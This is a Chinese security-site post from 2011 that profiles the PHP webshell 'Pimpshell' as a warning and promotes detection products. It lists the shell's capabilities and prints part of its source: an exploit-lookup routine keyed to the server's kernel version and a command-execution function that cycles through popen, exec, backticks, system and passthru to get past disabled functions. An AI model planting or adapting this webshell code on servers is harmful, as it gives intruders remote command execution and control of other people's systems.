Pimpshell [beta revis. 2]

2011-12-14 14:48:19 来源:本站原创,请勿转载 浏览:300
Pimpshell [beta revis. 2]

木马名称:Pimpshell [beta revis. 2]
木马格式:php
默认密码:
木马作用:功能超多,文件管理,运行CMD,查看IIS信息,进程信息,系统服务,用户信息,系统信息,文件搜索,注册表,端口扫描,数据库连接,端口映射,PHP工具,Cpanel账户搜索,开代理,注入,挂马……

运行界面如下:(图片若超出屏幕,请右键另存到本地查看)

总结:Pimpshell功能确实有点强大,要注意防范!
防御方法:护卫神入侵防护系统、护卫神云查杀均可查杀 Pimpshell 这个php网页木马。

Pimpshell部分代码:
//exploit search
$Lversion = php_uname(r);
$OSV = php_uname(s);
if(eregi('Linux',$OSV))
{
$Lversion=substr($Lversion,0,6);
$millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
$stormlink="http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+".$Lversion;
}else{
$Lversion=substr($Lversion,0,3);
$millink="http://milw0rm.com/search.php?dong=".$OSV.' '.$Lversion;
$stormlink="http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=".$OSV.'+'.$Lversion;
}
//End of milw0rm search
//w4ck1ng Shell
if (!function_exists('myshellexec'))
{
if(is_callable('popen')){
function myshellexec($command) {
if (!($p=popen("($command)2>&1",'r'))) {
return 126;
}
while (!feof($p)) {
$line=fgets($p,1000);
$out .= $line;
}
pclose($p);
return $out;
}
}else{
function myshellexec($cmd)
{
 global $disablefunc;
 $result = '';
 if (!empty($cmd))
 {
  if (is_callable('exec') and !in_array('exec',$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable('system') and !in_array('system',$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable('passthru') and !in_array('passthru',$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_resource($fp = popen($cmd,'r')))
  {
   $result = '';
   while(!feof($fp)) {$result .= fread($fp,1024);}
   pclose($fp);
  }
 }
 return $result;
}
}
}

(0)
(0)